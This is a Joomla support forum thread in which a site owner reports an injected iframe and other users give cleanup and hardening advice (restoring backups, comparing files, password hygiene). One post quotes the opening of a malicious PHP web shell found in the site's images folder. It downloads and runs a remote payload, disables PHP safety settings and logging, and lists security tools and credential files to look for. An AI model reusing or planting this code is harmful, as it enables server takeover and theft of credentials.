
Trojan / Virus On My Site

    • Royalty
    • Jr. Rocketeer
    • Posts: 32
    • Thanks: 0

    Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • Somehow an iframe is inserted at the top of some of my pages. I'm trying to figure out how I go about removing this. It seems to be showing up on my 404 pages and on a random audio page for some reason. Norton's page shows that it's on my home page as well, but I can't see it there anywhere. Apparently it only affects IE, but I obviously need to remove it ASAP.

      Any help would be GREATLY appreciated!
    • Last Edit: 14 years 11 months ago by Royalty.
    • Rich Bean
    • Elite Rocketeer
    • Posts: 1194
    • Thanks: 1

    Re: Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • JEM
    • Preeminent Rocketeer
    • Posts: 17917
    • Thanks: 4

    Re: Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • 1) Contact your host and let them know you were hacked.

      2) Along with Richard's suggestion, another option is to wipe the site clean and restore from your latest backup. If you don't have a recent one, your host may. Usually hosts back up every 24 hours and keep 3 days' worth of backups, so you might get lucky... You should also consider, after all this is sorted, creating a solid backup strategy. Many of us use Akeeba and back up often (before and after making major changes or updates).

      www.akeebabackup.com/akeeba-backup-for-joomla/index.html

      3) www.rockettheme.com/forum/index.php?f=15&t=54455&rb_v=viewtopic - Scroll down to 'Joomla Security and Configuration', there's lots of info for securing your site.
    • Thanks,
      jim
    • Royalty
    • Jr. Rocketeer
    • Posts: 32
    • Thanks: 0

    Re: Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • I found a suspicious file in my /images folder. Apparently it's set to automatically run some sort of script or something. I'm not sure if this is what is placing the iframe "xm" at the top of my pages or not. I deleted it, but the iframe is still appearing, so I guess I've got more work to do.

      <?php

      if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}

      if(isset($_POST['start_socks'],$_POST['download_path']))
          {
              function execute($cfe)
              {
              $res = '';
              if(@function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); }
              elseif(@function_exists('shell_exec')) $res = @shell_exec($cfe);
              elseif(@function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
              elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
              }

          @$f=fopen('/tmp/httpd_conf.tmp.php','w');
          fwrite($f,file_get_contents($_POST['download_path'])); fclose($f);
          $path = execute("which php");
          @execute("$path /tmp/httpd_conf.tmp.php &");
          die;
          }

      $language='eng';

      $auth = 0;

      $name='7d1f6442a9ed59e62f93d';
      $pass='7d1f6442a9ed59e62f93d';

      //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
      @setlocale(LC_ALL,'ru_RU.cp1251');

      @ini_restore("safe_mode");
      @ini_restore("open_basedir");
      @ini_restore("safe_mode_include_dir");
      @ini_restore("safe_mode_exec_dir");
      @ini_restore("disable_functions");
      @ini_restore("allow_url_fopen");

      if(@function_exists('ini_set'))
       {
       @ini_set('error_log',NULL);
       @ini_set('log_errors',0);
       @ini_set('file_uploads',1);
       @ini_set('allow_url_fopen',1);
       }
      else
       {
       @ini_alter('error_log',NULL);
       @ini_alter('log_errors',0);
       @ini_alter('file_uploads',1);
       @ini_alter('allow_url_fopen',1);
       }

      error_reporting(E_ALL);

      /* For the header */
      $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
      $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm',
      'tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
      $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
      $tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');

      /* For reading the directory listing via realpath() */
      //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
      //$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
      //$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
      //$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
      //$chars_rlph = "_-.01234567890";
      $chars_rlph = "abcdefghijklnmopqrstuvwxyz";

      $presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
      'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
      'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
      'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing','Windows',
      'Documents and Settings','Program Files','boot.ini','apache');

      /******************************************************************************************************/

    • RuiGato
    • Sr. Rocketeer
    • Posts: 209
    • Thanks: 0

    Re: Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • 1. Download your site to your PC via FTP.
      2. Download the latest version of J!
      3. Compare file by file with WinMerge.
      You can see if there are any new files or modifications in the core ones.
      If you have any components/modules installed, compare them also.
      Check for any suspected files in the media and templates folders.
      Check the security checklist in the Joomla docs.

      You can find something this way, but the most important thing IMO is to also find how they got onto your site.

      Keep your PC secure, use strong passwords, don't use the admin account if you use Windows, use an FTP program that encrypts the passwords (programs like FileZilla store passwords in a plain XML file, a bad thing if your PC is compromised).
      Make regular and redundant backups.
      Don't use the same password for cPanel/database/Joomla admin/FTP.
      Obscure your site by removing the generator tag: $this->setGenerator('anything');
      Keep your extensions updated, uninstall unused extensions, subscribe to the security feeds, check your extensions' support forums regularly for updates.
      Get a decent host, check the PHP settings, check your file/folder permissions.

      Man, the list never ends, and even if you follow every single step and recommendation known, you still aren't 100% secure.
    • twitter.com/ruigato
    • Rich Bean
    • Elite Rocketeer
    • Posts: 1194
    • Thanks: 1

    Re: Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • lafrance
    • Hero Rocketeer
    • Posts: 324
    • Thanks: 0

    Re: Trojan / Virus On My Site

    Posted 14 years 11 months ago
    • @RICHARD BEAN
      +1
      I use it, so far so good.

      What I also love: there was a bug in one Joomla version that changed some PHP and image file permissions to 666.
      I was able to notice it right away and change it.

      Pierre
    • Please be kind: no PM without asking. PM without asking will result in the foe list.
      Help also on freenode IRC #joomla. Hosting solution for a great value, 20 users only per server.
      Pierre.
